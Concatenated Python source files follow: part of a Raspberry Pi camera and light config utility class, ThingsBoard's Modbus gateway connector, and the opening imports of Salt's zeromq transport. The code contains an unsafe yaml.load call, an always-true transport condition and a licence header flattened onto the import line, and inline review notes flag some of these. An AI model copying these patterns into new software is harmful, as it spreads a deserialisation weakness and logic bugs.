        return datetime.datetime.now().isoformat()

    @classmethod
    def get_external_ip(cls):
        """
        returns the external IP address of the raspberry pi through api.ipify.org

        :return: the external ip address
        :rtype: str
        """
        # cached for 60 seconds (network call)
        if abs(cls._external_ip[-1] - time.time()) > 60:
            try:
                url = 'https://api.ipify.org/?format=json'
                response = request.urlopen(url, timeout=10).read().decode('utf-8')
                cls._external_ip = json.loads(response)['ip'], time.time()
            except:
                cls._external_ip = "0.0.0.0", time.time()
        return cls._external_ip[0]

    @classmethod
    def get_identifier_from_name(cls, name):
        """
        returns either the identifier (from name) or the name filled with the machine id
        clamps to 32 characters.

        :param name: name to fill
        :type name: str
        :return: filled name
        :rtype: str
        """
        # overlay `name` onto the machine-id: positions past the end of
        # `name` fall through to the machine-id characters
        identifier = "".join((x if idx > len(name) - 1 else name[idx] for idx, x in enumerate(cls.get_machineid())))
        return identifier[:32]

    @classmethod
    def get_identifier_from_filename(cls, file_name):
        """
        returns either the identifier (from the file name) or the name filled with the machine id

        :param file_name: filename
        :type file_name: str
        :return: string identifier,
        :rtype: str
        """
        # basename without extension, then filled via get_identifier_from_name
        fsn = next(iter(os.path.splitext(os.path.basename(file_name))), "")
        return cls.get_identifier_from_name(fsn)

    @classmethod
    def ensure_config(cls, identifier):
        """
        ensures a configuration file exists for this identifier.
        if a config file doesnt exist then it will create a default one.

        :param identifier: identifier to create or find a configuration file for.
        :type identifier: str
        :return: the configuration file dict or configparser object.
        :rtype: dict or configparser.ConfigParser
        """
        config = configparser.ConfigParser()
        config.read_string(default_config)
        path = cls.identifier_to_ini(identifier)
        try:
            # config.read returns the list of files successfully parsed;
            # non-empty means an existing config was loaded, so return it as-is
            if len(config.read(path)):
                return config
        except Exception as e:
            print(str(e))

        # no existing file: fill in identifier-derived defaults and persist
        if not config['localfiles']['spooling_dir']:
            config['localfiles']['spooling_dir'] = "/home/images/spool/{}".format(identifier)

        if not config['localfiles']['upload_dir']:
            config['localfiles']['upload_dir'] = "/home/images/upload/{}".format(identifier)

        if not config['camera']['name']:
            config['camera']['name'] = cls.get_hostname() + identifier[:6]

        cls.write_config(config, identifier)
        return config

    @classmethod
    def write_config(cls, config: configparser.ConfigParser, identifier: str):
        """
        writes a configuration file to an correct config file path.

        :param config: configuration file (configparser object)
        :type identifier: str
        :param identifier: identifier to user as the raget file name.
        :return: configparser object
        """
        path = SysUtil.identifier_to_ini(identifier)
        with open(path, 'w+') as configfile:
            config.write(configfile)
        return config

    @classmethod
    def identifier_to_ini(cls, identifier: str)->str:
        """
        gets a valid .ini path for an identifier.

        :param identifier: identifier to find an ini for.
        :return: file path for identifier
        :rtype: str
        """
        # for/else: the else only runs when no existing ini matched, in which
        # case a default path for a new ini is returned
        for fn in glob("configs_byserial/*.ini"):
            if identifier == cls.get_identifier_from_filename(fn):
                return fn
        else:
            return os.path.join("configs_byserial/", identifier) + ".ini"

    @classmethod
    def ensure_light_config(cls, identifier):
        """
        ensures a configuration file exists for this identifier.
        if a config file doesnt exist then it will create a default one.

        :param identifier: identifier of the light
        :type identifier: str
        :return: configuration for the light
        :rtype: configparser.ConfigParser
        """
        config = configparser.ConfigParser()
        config.read_string(default_light_config)
        # NOTE(review): uses identifier_to_ini (camera configs dir) rather
        # than light_identifier_to_ini — presumably intentional fallthrough,
        # but verify against callers.
        path = cls.identifier_to_ini(identifier)
        try:
            if len(config.read(path)):
                return config
        except Exception as e:
            print(str(e))

        if "{identifier}" in config.get("light", "file_path"):
            config.set("light", "file_path", config.get('light', "file_path").format(identifier=identifier))

        cls.write_light_config(config, identifier)
        return config

    @classmethod
    def get_light_configs(cls):
        """
        gets a dict of the light config files (.ini)

        :return: dict of light configs
        :rtype: dict(str: configparser.ConfigParser)
        """
        def slc_csv_exists(fp):
            # a light ini only counts if a sibling .csv or .slc data file exists
            return os.path.exists(os.path.splitext(fp)[0]+".csv") or os.path.exists(os.path.splitext(fp)[0]+".slc")

        def get_id(fp):
            n, ext = os.path.splitext(os.path.basename(fp))
            return n

        try:
            files = [x for x in glob("light_configs_byip/*.ini") if slc_csv_exists(x)]
            f_and_id = {get_id(x): x for x in files}
            return f_and_id
        except Exception as e:
            cls.logger.error("Couldnt enumerate lights, no light functionality. {}".format(str(e)))
            return dict()

    @classmethod
    def write_light_config(cls, config: configparser.ConfigParser, identifier: str):
        """
        writes a configuration file to an correct config file path.

        :param config: configuration file (configparser object)
        :param identifier: identifier of the light.
        :type identifier: str
        :return: configparser object
        """
        path = SysUtil.light_identifier_to_ini(identifier)
        with open(path, 'w+') as configfile:
            config.write(configfile)
        return config

    @classmethod
    def get_light_datafile(cls, identifier: str)->str:
        """
        gets a light datafile

        :param identifier: identifier to use to find the data file.
        :type identifier: str
        :return: file path for csv or slc.
        :rtype: str
        """
        # prefer the already-fixed .slc file over the raw .csv
        csv = "lights_byip/{}.csv".format(identifier)
        slc = "lights_byip/{}.slc".format(identifier)
        if os.path.exists(slc) and os.path.isfile(slc):
            return slc
        elif os.path.exists(csv) and os.path.isfile(csv):
            return csv
        else:
            return ""

    @classmethod
    def load_or_fix_solarcalc(cls, identifier: str)->list:
        """
        function to either load an existing fixed up solarcalc file or to coerce one into the fixed format.

        :param identifier: identifier of the light for which the solarcalc file exists.
        :type identifier: str
        :return: light timing data as a list of lists.
        :rtype: list(list())
        """
        lx = []
        fp = cls.get_light_datafile(identifier)
        path, ext = os.path.splitext(fp)
        # headers for 10-LED and 7-LED controller variants (15 vs 12 columns)
        header10 = ['datetime', 'temp', 'relativehumidity',
                    'LED1', 'LED2', 'LED3', 'LED4', 'LED5', 'LED6', 'LED7', 'LED8', 'LED9', 'LED10',
                    'total_solar_watt', 'simulated_datetime']
        header7 = ['datetime', 'temp', 'relativehumidity',
                   'LED1', 'LED2', 'LED3', 'LED4', 'LED5', 'LED6', 'LED7',
                   'total_solar_watt', 'simulated_datetime']
        if not os.path.isfile(fp):
            SysUtil.logger.error("no SolarCalc file.")
            raise FileNotFoundError()
        if ext == ".slc":
            # already fixed: just parse the csv-ish rows
            with open(fp) as f:
                lx = [x.strip().split(",") for x in f.readlines()]
        else:
            # raw csv: normalise the two date columns to iso8601, prepend the
            # matching header and persist the result as a .slc file
            with open(fp) as f:
                l = [x.strip().split(",") for x in f.readlines()]

            def get_lines(li):
                print("Loading csv")
                for idx, line in enumerate(li):
                    try:
                        yield [
                            datetime.datetime.strptime("{}_{}".format(line[0], line[1]), "%d/%m/%Y_%H:%M").isoformat(),
                            *line[2:-1],
                            datetime.datetime.strptime(line[-1], "%d %b %Y %H:%M").isoformat()
                        ]
                    except Exception as e:
                        SysUtil.logger.error("Couldnt fix solarcalc file. {}".format(str(e)))
                        print(l)

            lx.extend(get_lines(l))
            if len(l[0]) == 15:
                lx.insert(0, header10)
            else:
                lx.insert(0, header7)
            with open(path+".slc", 'w') as f:
                f.write("\n".join([",".join(x) for x in lx]))
        # parse the iso strings back into datetime objects, skipping the header
        for idx, x in enumerate(lx[1:]):
            lx[idx+1][0] = datetime.datetime.strptime(x[0], "%Y-%m-%dT%H:%M:%S")
            lx[idx+1][-1] = datetime.datetime.strptime(x[-1], "%Y-%m-%dT%H:%M:%S")
        return lx[1:]

    @classmethod
    def light_identifier_to_ini(cls, identifier: str)->str:
        """
        gets a valid .ini path for an identifier.

        :param identifier: identifier for a light
        :type identifier: str
        :return: ini filename for a light
        :rtype: str
        """
        # for/else: fall through to a default new-file path when nothing matches
        for fn in glob("lights_byip/*.ini"):
            if identifier == cls.get_identifier_from_filename(fn):
                return fn
        else:
            return os.path.join("lights_byip/", identifier) + ".ini"

    @classmethod
    def identifier_to_yml(cls, identifier: str)->str:
        """
        the same as identifier_to_ini but for yml files

        :param identifier: identifier for a matching yml file.
        :type identifier: str
        :return: string filepath for the yml file.
        :rtype: str
        """
        for fn in glob("configs_byserial/*.yml"):
            if identifier == cls.get_identifier_from_filename(fn):
                return fn
        else:
            return os.path.join("configs_byserial/", identifier) + ".yml"

    @classmethod
    def configs_from_identifiers(cls, identifiers: set) -> dict:
        """
        given a set of identifiers, returns a dictionary of the data contained in those config files
        with the key for each config file data being the identifier

        :param identifiers:
        :type identifiers: list(str)
        :return: dictionary of configuration datas
        :rtype: dict(str: dict)
        """
        data = dict()
        for ini in ["configs_byserial/{}.ini".format(x) for x in identifiers]:
            cfg = configparser.ConfigParser()
            cfg.read(ini)
            d = dict()
            d = {section: dict(cfg.items(section)) for section in cfg.sections()}
            data[cls.get_identifier_from_filename(ini)] = d
        return data

    @classmethod
    def add_watch(cls, path: str, callback):
        """
        adds a watch that calls the callback on file change

        :param path: path of the file to watch
        :type path: str
        :param callback: function signature to call when the file is changed
        """
        # raises if `path` does not exist (os.stat)
        cls._watches.append((path, os.stat(path).st_mtime, callback))

    @classmethod
    def open_yaml(cls, filename):
        """
        opens a yaml file using yaml.load

        :param filename: yaml file to load
        :return: dictionary of values in yaml file
        :rtype: dict
        """
        try:
            with open(filename) as e:
                # NOTE(review): yaml.load without an explicit Loader is
                # deprecated and unsafe on untrusted input — prefer
                # yaml.safe_load.
                q = yaml.load(e.read())
                return q
        except Exception as e:
            print(str(e))
            return dict()

    @classmethod
    def _thread(cls):
        """
        runs the watchers
        """
        # poll each watched file's mtime once a second; on change, record the
        # new mtime and invoke the callback. Any unexpected error (e.g. a
        # watched file disappearing) ends the thread.
        while True and not cls.stop:
            try:
                for index, (path, mtime, callback) in enumerate(cls._watches):
                    tmt = os.stat(path).st_mtime
                    if tmt != mtime:
                        cls._watches[index] = (path, tmt, callback)
                        try:
                            print("calling {}".format(callback))
                            callback()
                        except Exception as e:
                            print(str(e))
                time.sleep(1)
            except Exception as e:
                break
        cls.thread = None
modbus_connector.py
# Copyright 2022. ThingsBoard # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from threading import Thread from time import sleep, time from queue import Queue from random import choice from string import ascii_lowercase from thingsboard_gateway.tb_utility.tb_utility import TBUtility # Try import Pymodbus library or install it and import try: from pymodbus.constants import Defaults except ImportError: print("Modbus library not found - installing...") TBUtility.install_package("pymodbus", ">=2.3.0") TBUtility.install_package('pyserial') TBUtility.install_package('twisted') from pymodbus.constants import Defaults from twisted.internet import reactor from pymodbus.bit_write_message import WriteSingleCoilResponse, WriteMultipleCoilsResponse from pymodbus.register_write_message import WriteMultipleRegistersResponse, WriteSingleRegisterResponse from pymodbus.register_read_message import ReadRegistersResponseBase from pymodbus.bit_read_message import ReadBitsResponseBase from pymodbus.client.sync import ModbusTcpClient, ModbusUdpClient, ModbusSerialClient from pymodbus.client.sync import ModbusRtuFramer, ModbusSocketFramer, ModbusAsciiFramer from pymodbus.exceptions import ConnectionException from pymodbus.server.asynchronous import StartTcpServer, StartUdpServer, StartSerialServer, StopServer from pymodbus.device import ModbusDeviceIdentification from pymodbus.version import version from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext from pymodbus.datastore import 
ModbusSparseDataBlock  # NOTE(review): tail of an import statement truncated at the chunk boundary (start of the import is outside this view)
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.modbus.constants import *
from thingsboard_gateway.connectors.modbus.slave import Slave
from thingsboard_gateway.connectors.modbus.backward_compability_adapter import BackwardCompatibilityAdapter
from thingsboard_gateway.connectors.modbus.bytes_modbus_downlink_converter import BytesModbusDownlinkConverter

# Sections of converted data forwarded to the platform.
CONVERTED_DATA_SECTIONS = [ATTRIBUTES_PARAMETER, TELEMETRY_PARAMETER]

# Modbus framing implementations, keyed by the "method" config value.
FRAMER_TYPE = {
    'rtu': ModbusRtuFramer,
    'socket': ModbusSocketFramer,
    'ascii': ModbusAsciiFramer
}

# Server starters used when the gateway itself acts as a Modbus slave.
SLAVE_TYPE = {
    'tcp': StartTcpServer,
    'udp': StartUdpServer,
    'serial': StartSerialServer
}

# Config section name -> ModbusSlaveContext block keyword.
FUNCTION_TYPE = {
    'coils_initializer': 'ci',
    'holding_registers': 'hr',
    'input_registers': 'ir',
    'discrete_inputs': 'di'
}

# (single-object, multi-object) Modbus write function codes per register type.
FUNCTION_CODE_WRITE = {
    'holding_registers': (6, 16),
    'coils_initializer': (5, 15)
}

# Modbus read function codes per register type.
FUNCTION_CODE_READ = {
    'holding_registers': 3,
    'coils_initializer': 1,
    'input_registers': 4,
    'discrete_inputs': 2
}


class ModbusConnector(Connector, Thread):
    """Gateway connector polling Modbus slaves (and optionally serving as one).

    Slaves to poll are queued class-wide via ``callback``; ``run`` drains the
    queue in worker threads.
    """

    # Class-wide queue of Slave objects due for polling (shared by all instances).
    process_requests = Queue(-1)

    def __init__(self, gateway, config, connector_type):
        self.statistics = {STATISTIC_MESSAGE_RECEIVED_PARAMETER: 0,
                           STATISTIC_MESSAGE_SENT_PARAMETER: 0}
        super().__init__()
        self.__gateway = gateway
        self._connector_type = connector_type
        # Old-style configs are converted to the current schema first.
        self.__backward_compatibility_adapter = BackwardCompatibilityAdapter(config)
        self.__config = self.__backward_compatibility_adapter.convert()
        self.setName(self.__config.get("name", 'Modbus Default ' + ''.join(choice(ascii_lowercase) for _ in range(5))))
        self.__connected = False
        self.__stopped = False
        self.daemon = True

        if self.__config.get('slave'):
            # Run the gateway's own Modbus slave server in a background thread.
            self.__slave_thread = Thread(target=self.__configure_and_run_slave, args=(self.__config['slave'],),
                                         daemon=True, name='Gateway as a slave')
            self.__slave_thread.start()

            if config['slave'].get('sendDataToThingsBoard', False):
                self.__modify_main_config()

        self.__slaves = []
        self.__load_slaves()

    def is_connected(self):
        # True once run() has started; never reset on stop — TODO confirm intended.
        return self.__connected

    def open(self):
        self.__stopped = False
        self.start()

    def run(self):
        self.__connected = True

        while True:
            if not self.__stopped and not ModbusConnector.process_requests.empty():
                # One worker thread per wake-up; __process_slaves pops one slave.
                thread = Thread(target=self.__process_slaves, daemon=True)
                thread.start()

            if self.__stopped:
                break

            sleep(.2)

    @staticmethod
    def __configure_and_run_slave(config):
        """Build identity/data blocks from config and start a Modbus server (blocking)."""
        identity = None
        if config.get('identity'):
            identity = ModbusDeviceIdentification()
            identity.VendorName = config['identity'].get('vendorName', '')
            identity.ProductCode = config['identity'].get('productCode', '')
            identity.VendorUrl = config['identity'].get('vendorUrl', '')
            identity.ProductName = config['identity'].get('productName', '')
            identity.ModelName = config['identity'].get('ModelName', '')
            identity.MajorMinorRevision = version.short()

        blocks = {}
        for (key, value) in config.get('values').items():
            values = {}
            converter = BytesModbusDownlinkConverter({})
            for item in value:
                for section in ('attributes', 'timeseries', 'attributeUpdates', 'rpc'):
                    for val in item.get(section, []):
                        # Single object -> single-write code, otherwise multi-write code.
                        function_code = FUNCTION_CODE_WRITE[key][0] if val['objectsCount'] <= 1 else \
                            FUNCTION_CODE_WRITE[key][1]
                        converted_value = converter.convert(
                            {**val,
                             'device': config.get('deviceName', 'Gateway'), 'functionCode': function_code,
                             'byteOrder': config['byteOrder']}, {'data': {'params': val['value']}})
                        values[val['address'] + 1] = converted_value

            blocks[FUNCTION_TYPE[key]] = ModbusSparseDataBlock(values)

        context = ModbusServerContext(slaves=ModbusSlaveContext(**blocks), single=True)
        # NOTE(review): "(config['type'] == 'tcp' or 'udp')" is always truthy —
        # 'udp' is a non-empty string, so the address tuple is passed for every
        # transport type; likely meant config['type'] in ('tcp', 'udp').
        SLAVE_TYPE[config['type']](context, identity=identity,
                                   address=(config.get('host'), config.get('port')) if (
                                           config['type'] == 'tcp' or 'udp') else None,
                                   port=config.get('port') if config['type'] == 'serial' else None,
                                   framer=FRAMER_TYPE[config['method']])

    def __modify_main_config(self):
        """Mirror the local slave's values into the master config so its data is polled."""
        config = self.__config['slave']
        values = config.pop('values')
        device = config
        for (register, reg_values) in values.items():
            for value in reg_values:
                for section in ('attributes', 'timeseries', 'attributeUpdates', 'rpc'):
                    if not device.get(section):
                        device[section] = []
                    for item in value.get(section, []):
                        device[section].append({**item, 'functionCode': FUNCTION_CODE_READ[register]})

        self.__config['master']['slaves'].append(device)

    def __load_slaves(self):
        # One Slave wrapper per configured device under master.slaves.
        self.__slaves = [
            Slave(**{**device, 'connector': self, 'gateway': self.__gateway, 'callback': ModbusConnector.callback})
            for device in self.__config.get('master', {'slaves': []}).get('slaves', [])]

    @classmethod
    def callback(cls, slave):
        # Invoked by Slave timers: enqueue the slave for polling by run().
        cls.process_requests.put(slave)

    @property
    def connector_type(self):
        return self._connector_type

    def __convert_and_save_data(self, config_tuple):
        """Convert raw device responses via the uplink converter and push to storage."""
        device, current_device_config, config, device_responses = config_tuple
        converted_data = {}
        try:
            converted_data = device.config[UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
                config=config,
                data=device_responses)
        except Exception as e:
            log.error(e)

        to_send = {DEVICE_NAME_PARAMETER: converted_data[DEVICE_NAME_PARAMETER],
                   DEVICE_TYPE_PARAMETER: converted_data[DEVICE_TYPE_PARAMETER],
                   TELEMETRY_PARAMETER: [],
                   ATTRIBUTES_PARAMETER: []
                   }

        if current_device_config.get('sendDataOnlyOnChange'):
            self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1

            # Only forward keys whose value changed since the last report.
            for converted_data_section in CONVERTED_DATA_SECTIONS:
                for current_section_dict in converted_data[converted_data_section]:
                    for key, value in current_section_dict.items():
                        if device.config[LAST_PREFIX + converted_data_section].get(key) is None or \
                                device.config[LAST_PREFIX + converted_data_section][key] != value:
                            device.config[LAST_PREFIX + converted_data_section][key] = value
                            to_send[converted_data_section].append({key: value})
        elif converted_data and current_device_config.get('sendDataOnlyOnChange') is None or \
                not current_device_config.get('sendDataOnlyOnChange'):
            # NOTE(review): 'and' binds tighter than 'or' here — verify precedence is intended.
            self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1

            for converted_data_section in CONVERTED_DATA_SECTIONS:
                device.config[LAST_PREFIX + converted_data_section] = converted_data[
                    converted_data_section]
                to_send[converted_data_section] = converted_data[converted_data_section]

        if to_send.get(ATTRIBUTES_PARAMETER) or to_send.get(TELEMETRY_PARAMETER):
            self.__gateway.send_to_storage(self.get_name(), to_send)
            self.statistics[STATISTIC_MESSAGE_SENT_PARAMETER] += 1

    def close(self):
        self.__stopped = True
        self.__stop_connections_to_masters()
        if reactor.running:
            StopServer()
        log.info('%s has been stopped.', self.get_name())

    def get_name(self):
        return self.name

    def __process_slaves(self):
        # TODO: write documentation
        # Pop one queued slave, poll its configured sections, then convert/forward.
        device = ModbusConnector.process_requests.get()

        device_responses = {'timeseries': {}, 'attributes': {}}
        current_device_config = {}
        try:
            for config_section in device_responses:
                if device.config.get(config_section) is not None:
                    current_device_config = device.config

                    self.__connect_to_current_master(device)

                    if not device.config['master'].is_socket_open() or not len(
                            current_device_config[config_section]):
                        continue

                    # Reading data from device
                    for interested_data in range(len(current_device_config[config_section])):
                        current_data = current_device_config[config_section][interested_data]
                        current_data[DEVICE_NAME_PARAMETER] = device
                        input_data = self.__function_to_device(device, current_data)
                        device_responses[config_section][current_data[TAG_PARAMETER]] = {
                            "data_sent": current_data,
                            "input_data": input_data}

                    log.debug("Checking %s for device %s", config_section, device)
                    # NOTE(review): missing %s placeholder — device_responses is never rendered.
                    log.debug('Device response: ', device_responses)

            if device_responses.get('timeseries') or device_responses.get('attributes'):
                self.__convert_and_save_data((device, current_device_config, {
                    **current_device_config,
                    BYTE_ORDER_PARAMETER: current_device_config.get(BYTE_ORDER_PARAMETER, device.byte_order),
                    WORD_ORDER_PARAMETER: current_device_config.get(WORD_ORDER_PARAMETER, device.word_order)
                }, device_responses))

        except ConnectionException:
            sleep(5)
            log.error("Connection lost! Reconnecting...")
        except Exception as e:
            log.exception(e)

    def __connect_to_current_master(self, device=None):
        # TODO: write documentation
        # Lazily build the Modbus client, then retry connecting with backoff limits.
        connect_attempt_count = 5
        connect_attempt_time_ms = 100
        wait_after_failed_attempts_ms = 300000

        if device.config.get('master') is None:
            device.config['master'], device.config['available_functions'] = self.__configure_master(device.config)

        if connect_attempt_count < 1:
            connect_attempt_count = 1

        connect_attempt_time_ms = device.config.get('connectAttemptTimeMs', connect_attempt_time_ms)

        if connect_attempt_time_ms < 500:
            connect_attempt_time_ms = 500

        wait_after_failed_attempts_ms = device.config.get('waitAfterFailedAttemptsMs', wait_after_failed_attempts_ms)

        if wait_after_failed_attempts_ms < 1000:
            wait_after_failed_attempts_ms = 1000

        current_time = time() * 1000

        if not device.config['master'].is_socket_open():
            if device.config['connection_attempt'] >= connect_attempt_count and current_time - device.config[
                    'last_connection_attempt_time'] >= wait_after_failed_attempts_ms:
                device.config['connection_attempt'] = 0

            while not device.config['master'].is_socket_open() \
                    and device.config['connection_attempt'] < connect_attempt_count \
                    and current_time - device.config.get('last_connection_attempt_time',
                                                         0) >= connect_attempt_time_ms:
                device.config['connection_attempt'] = device.config[
                                                          'connection_attempt'] + 1
                device.config['last_connection_attempt_time'] = current_time
                log.debug("Modbus trying connect to %s", device)
                device.config['master'].connect()

                if device.config['connection_attempt'] == connect_attempt_count:
                    # NOTE(review): log.warn is deprecated in favour of log.warning.
                    log.warn("Maximum attempt count (%i) for device \"%s\" - encountered.", connect_attempt_count,
                             device)

        if device.config['connection_attempt'] >= 0 and device.config['master'].is_socket_open():
            device.config['connection_attempt'] = 0
            device.config['last_connection_attempt_time'] = current_time

    @staticmethod
    def __configure_master(config):
        """Create the pymodbus client for this device and its function-code dispatch table."""
        current_config = config
        current_config["rtu"] = FRAMER_TYPE[current_config['method']]

        if current_config.get('type') == 'tcp':
            master = ModbusTcpClient(current_config["host"],
                                     current_config["port"],
                                     current_config["rtu"],
                                     timeout=current_config["timeout"],
                                     retry_on_empty=current_config["retry_on_empty"],
                                     retry_on_invalid=current_config["retry_on_invalid"],
                                     retries=current_config["retries"])
        elif current_config.get(TYPE_PARAMETER) == 'udp':
            master = ModbusUdpClient(current_config["host"],
                                     current_config["port"],
                                     current_config["rtu"],
                                     timeout=current_config["timeout"],
                                     retry_on_empty=current_config["retry_on_empty"],
                                     retry_on_invalid=current_config["retry_on_invalid"],
                                     retries=current_config["retries"])
        elif current_config.get(TYPE_PARAMETER) == 'serial':
            master = ModbusSerialClient(method=current_config["method"],
                                        port=current_config["port"],
                                        timeout=current_config["timeout"],
                                        retry_on_empty=current_config["retry_on_empty"],
                                        retry_on_invalid=current_config["retry_on_invalid"],
                                        retries=current_config["retries"],
                                        baudrate=current_config["baudrate"],
                                        stopbits=current_config["stopbits"],
                                        bytesize=current_config["bytesize"],
                                        parity=current_config["parity"],
                                        strict=current_config["strict"])
        else:
            raise Exception("Invalid Modbus transport type.")

        # Modbus function code -> bound client method.
        available_functions = {
            1: master.read_coils,
            2: master.read_discrete_inputs,
            3: master.read_holding_registers,
            4: master.read_input_registers,
            5: master.write_coil,
            6: master.write_register,
            15: master.write_coils,
            16: master.write_registers,
        }
        return master, available_functions

    def __stop_connections_to_masters(self):
        for slave in self.__slaves:
            if slave.config.get('master') is not None and slave.config.get('master').is_socket_open():
                slave.config['master'].close()

    @staticmethod
    def __function_to_device(device, config):
        """Dispatch a read/write request to the device by Modbus function code."""
        function_code = config.get('functionCode')
        result = None
        if function_code in (1, 2, 3, 4):
            result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER],
                                                                         count=config.get(OBJECTS_COUNT_PARAMETER,
                                                                                          config.get("registersCount",
                                                                                                     config.get(
                                                                                                         "registerCount",
                                                                                                         1))),
                                                                         unit=device.config['unitId'])
        elif function_code in (5, 6):
            result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER],
                                                                         value=config[PAYLOAD_PARAMETER],
                                                                         unit=device.config['unitId'])
        elif function_code in (15, 16):
            result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER],
                                                                         values=config[PAYLOAD_PARAMETER],
                                                                         unit=device.config['unitId'])
        else:
            log.error("Unknown Modbus function with code: %s", function_code)

        log.debug("With result %s", str(result))

        # pymodbus returns an exception response object on failure; detect via repr.
        if "Exception" in str(result):
            log.exception(result)
        return result

    def on_attributes_update(self, content):
        """Translate a shared-attribute update into a Modbus write via the RPC path."""
        try:
            device = tuple(filter(lambda slave: slave.name == content[DEVICE_SECTION_PARAMETER], self.__slaves))[0]

            for attribute_updates_command_config in device.config['attributeUpdates']:
                for attribute_updated in content[DATA_PARAMETER]:
                    if attribute_updates_command_config[TAG_PARAMETER] == attribute_updated:
                        to_process = {
                            DEVICE_SECTION_PARAMETER: content[DEVICE_SECTION_PARAMETER],
                            DATA_PARAMETER: {
                                RPC_METHOD_PARAMETER: attribute_updated,
                                RPC_PARAMS_PARAMETER: content[DATA_PARAMETER][attribute_updated]
                            }
                        }
                        self.__process_rpc_request(to_process, attribute_updates_command_config)
        except Exception as e:
            log.exception(e)

    def server_side_rpc_handler(self, server_rpc_request):
        """Route a server-side RPC request to the matching rpc config entry."""
        try:
            if server_rpc_request.get(DEVICE_SECTION_PARAMETER) is not None:
                log.debug("Modbus connector received rpc request for %s with server_rpc_request: %s",
                          server_rpc_request[DEVICE_SECTION_PARAMETER],
                          server_rpc_request)
                device = tuple(
                    filter(
                        lambda slave: slave.name == server_rpc_request[DEVICE_SECTION_PARAMETER], self.__slaves
                    )
                )[0]

                # rpc section may be a dict (method -> config) or a list of configs.
                if isinstance(device.config[RPC_SECTION], dict):
                    rpc_command_config = device.config[RPC_SECTION].get(
                        server_rpc_request[DATA_PARAMETER][RPC_METHOD_PARAMETER])

                    if rpc_command_config is not None:
                        self.__process_rpc_request(server_rpc_request, rpc_command_config)
                elif isinstance(device.config[RPC_SECTION], list):
                    for rpc_command_config in device.config[RPC_SECTION]:
                        if rpc_command_config[TAG_PARAMETER] == server_rpc_request[DATA_PARAMETER][
                                RPC_METHOD_PARAMETER]:
                            self.__process_rpc_request(server_rpc_request, rpc_command_config)
                            break
                else:
                    log.error("Received rpc request, but method %s not found in config for %s.",
                              server_rpc_request[DATA_PARAMETER].get(RPC_METHOD_PARAMETER),
                              self.get_name())
                    self.__gateway.send_rpc_reply(server_rpc_request[DEVICE_SECTION_PARAMETER],
                                                  server_rpc_request[DATA_PARAMETER][RPC_ID_PARAMETER],
                                                  {server_rpc_request[DATA_PARAMETER][
                                                       RPC_METHOD_PARAMETER]: "METHOD NOT FOUND!"})
            else:
                log.debug("Received RPC to connector: %r", server_rpc_request)
        except Exception as e:
            log.exception(e)

    def __process_rpc_request(self, content, rpc_command_config):
        """Execute one RPC (read or write) against the device and reply if an id is present."""
        if rpc_command_config is not None:
            device = tuple(filter(lambda slave: slave.name == content[DEVICE_SECTION_PARAMETER], self.__slaves))[0]
            rpc_command_config[UNIT_ID_PARAMETER] = device.config['unitId']
            self.__connect_to_current_master(device)
            # Write codes need the payload converted to raw Modbus values first.
            if rpc_command_config.get(FUNCTION_CODE_PARAMETER) in (5, 6, 15, 16):
                converted_data = device.config[DOWNLINK_PREFIX + CONVERTER_PARAMETER].convert(rpc_command_config,
                                                                                              content)
                try:
                    rpc_command_config[PAYLOAD_PARAMETER] = converted_data[0]
                except IndexError:
                    rpc_command_config[PAYLOAD_PARAMETER] = converted_data

            try:
                response = self.__function_to_device(device, rpc_command_config)
            except Exception as e:
                log.exception(e)
                response = e

            if isinstance(response, (ReadRegistersResponseBase, ReadBitsResponseBase)):
                to_converter = {
                    RPC_SECTION: {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: {"data_sent": rpc_command_config,
                                                                                  "input_data": response}}}
                response = device.config[
                    UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
                    config={**device.config,
                            BYTE_ORDER_PARAMETER: device.byte_order,
                            WORD_ORDER_PARAMETER: device.word_order
                            },
                    data=to_converter)
                log.debug("Received RPC method: %s, result: %r", content[DATA_PARAMETER][RPC_METHOD_PARAMETER],
                          response)
            elif isinstance(response, (WriteMultipleRegistersResponse,
                                       WriteMultipleCoilsResponse,
                                       WriteSingleCoilResponse,
                                       WriteSingleRegisterResponse)):
                log.debug("Write %r", str(response))
                response = {"success": True}

            if content.get(RPC_ID_PARAMETER) or (
                    content.get(DATA_PARAMETER) is not None and content[DATA_PARAMETER].get(RPC_ID_PARAMETER)):
                if isinstance(response, Exception):
                    self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
                                                  content[DATA_PARAMETER][RPC_ID_PARAMETER],
                                                  {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: str(response)})
                else:
                    self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
                                                  content[DATA_PARAMETER][RPC_ID_PARAMETER],
                                                  response)

            log.debug("%r", response)
# ---- zeromq.py (next concatenated file: salt.transport.zeromq) ----
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''

# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import hashlib
import logging
import weakref
from random import randint

# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
    import zmq.utils.monitor
    HAS_ZMQ_MONITOR = True
except ImportError:
    HAS_ZMQ_MONITOR = False

# Import Tornado Libs
import tornado
